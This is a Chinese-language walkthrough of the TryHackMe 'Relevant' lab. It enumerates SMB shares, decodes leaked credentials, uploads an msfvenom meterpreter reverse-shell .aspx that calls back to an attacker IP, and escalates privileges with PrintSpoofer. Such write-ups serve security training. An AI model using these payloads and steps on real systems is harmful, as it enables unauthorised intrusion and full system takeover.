TryHackMe | Relevant Writeup

信息收集

有2个 Web 服务（80/tcp、49663/tcp）以及网络共享（445/tcp和 rdp的3389端口。

有个nt4wrksv，连接看看

有一个密码文件，打开是base64

解码

Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$

想着拿密码先连接一波，直接就开始连接3389，好家伙，一个都不行

那就先看看80和49663端口吧，拿gobuster扫一下

发现了有个/nt4wksv目录，大胆推测这个就是我们共享文件的目录

果然访问到了

所以我们的方向就很明确了，上传shell到nt4wksv，然后利用web访问激活反弹shell

首先生成一个反向shell，而且我们知道49663端口是IIS web服务，所以我们可以用aspx文件

.aspx是ASP.NET 页面的扩展名。它无非是在静态HTML网页里面嵌入了动态的指令（这些动态指令是由各种脚本语言编写的，是由IIS服务器上的脚本引擎来执行的）

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.17.58.33 lport=1234 -f aspx -o shell.aspx

然后再在共享文件处上传

再我们网页端访问前先打开监听，然后再访问

然后访问

http://10.10.94.191:49663/nt4wrksv/shell.aspx

然后就得到了shell，然后执行shell后就可先找user.txt

提权

root.txt一定是需要最高权限的，所以我们需要提权

先看看令牌，检查我们的权限会发现我们被授予 SeImpersonatePrivilege

搜索了一下，确实存在可以利用的漏洞，利用PrintSpoofer来提权

下载工具

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

再利用文件共享上传到目标服务器上

再执行以下命令执行

PrintSpoofer64.exe -i -c cmd